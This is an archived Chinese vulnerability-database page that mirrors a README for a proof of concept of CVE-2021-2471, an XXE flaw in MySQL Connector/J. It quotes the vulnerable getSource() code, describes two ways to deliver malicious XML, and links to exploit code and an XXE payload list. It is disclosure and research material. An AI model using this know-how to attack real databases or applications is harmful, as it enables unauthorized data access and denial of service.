关联漏洞
标题:
Oracle MySQL 输入验证错误漏洞
(CVE-2021-2471)
描述:Oracle MySQL是美国甲骨文(Oracle)公司的一套开源的关系数据库管理系统。MySQL Connectors是其中的一个连接使用MySQL的应用程序的驱动程序。 Oracle MySQL 的 MySQL Connectors 产品中存在输入验证错误漏洞,该漏洞允许高特权攻击者通过多种协议访问网络来破坏 MySQL 连接器。成功攻击此漏洞会导致对关键数据的未授权访问或对所有 MySQL 连接器可访问数据的完全访问,以及导致 MySQL 连接器挂起或频繁重复崩溃。
描述
PoC for CVE-2021-2471 - XXE in MySQL Connector/J
介绍
# CVE-2021-2471 - XXE in MySQL Connector/J
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior.
</br>
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors.
### Disclaimer:
This vulnerability was found by Xu Yuanzhen of Alibaba Cloud Security Team and Hongkun Chen of Alibaba.
</br>
This PoC is provided for research purposes. Do not use it to attack targets that you do not have explicit permission to exploit.
### Vendor Disclosure:
The vendor's disclosure and fix for this vulnerability can be found [here](https://www.oracle.com/security-alerts/cpuoct2021.html).
### Proof Of Concept:
The XXE vulnerability consists of a XML containing malicious DTD Entities being received by a MysqlSQLXML component and is triggered when the getSource() function is called.
</br>
As seen in the code below from the mysql-connector-java-8.0.26.jar, when the DOMSource class is given as argument to the getSource() function, it exposes a DocumentBuilder in an unsafe way such that, if an attacker controls the content of the inputSource passed to the builder, he/she could leverage it for obtaining XXE:
```
public <T extends Source> T getSource(Class<T> clazz) throws SQLException {
try {
this.checkClosed();
this.checkWorkingWithResult();
InputSource reader;
if (clazz != null && !clazz.equals(SAXSource.class)) {
SQLException sqlEx;
if (clazz.equals(DOMSource.class)) {
try {
DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();
builderFactory.setNamespaceAware(true);
DocumentBuilder builder = builderFactory.newDocumentBuilder();
if (this.fromResultSet) {
inputSource = new InputSource(this.owningResultSet.getCharacterStream(this.columnIndexOfXml));
} else {
inputSource = new InputSource(new StringReader(this.stringRep));
}
return new DOMSource(builder.parse(inputSource));
```
There are 2 ways in which to pass the malicious XXE to the MysqlSQLXML:
- Using the sqlxml.setString() function (if the attacker can call or propagate arbitrary input to the setString function)
- Placing the XML in the DB and retrieving it via a result set using the resultSet.getSQLXML() function (if the attacker has write access to the DB, or can point the victim to an attacker-controlled database)
### Additional Resources:
[PoC XXE using sqlxml.setString()](Test.java)
</br>
[PoC XXE using resultSet.getSQLXML()](https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe/blob/main/src/main/java/me/threedr3am/bug/jdbc/sqlxml/xxe/oracle/OracleJDBC.java)
</br>
[Download vulnerable JAR](https://downloads.mysql.com/archives/get/p/3/file/mysql-connector-java-8.0.26.zip)
</br>
[Other XXE Payloads](https://github.com/payloadbox/xxe-injection-payload-list)
文件快照
[4.0K] /data/pocs/588ddb32a5213baa7141cb7641b585c8f3ba61e5
├── [3.2K] README.md
└── [ 993] Test.java
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。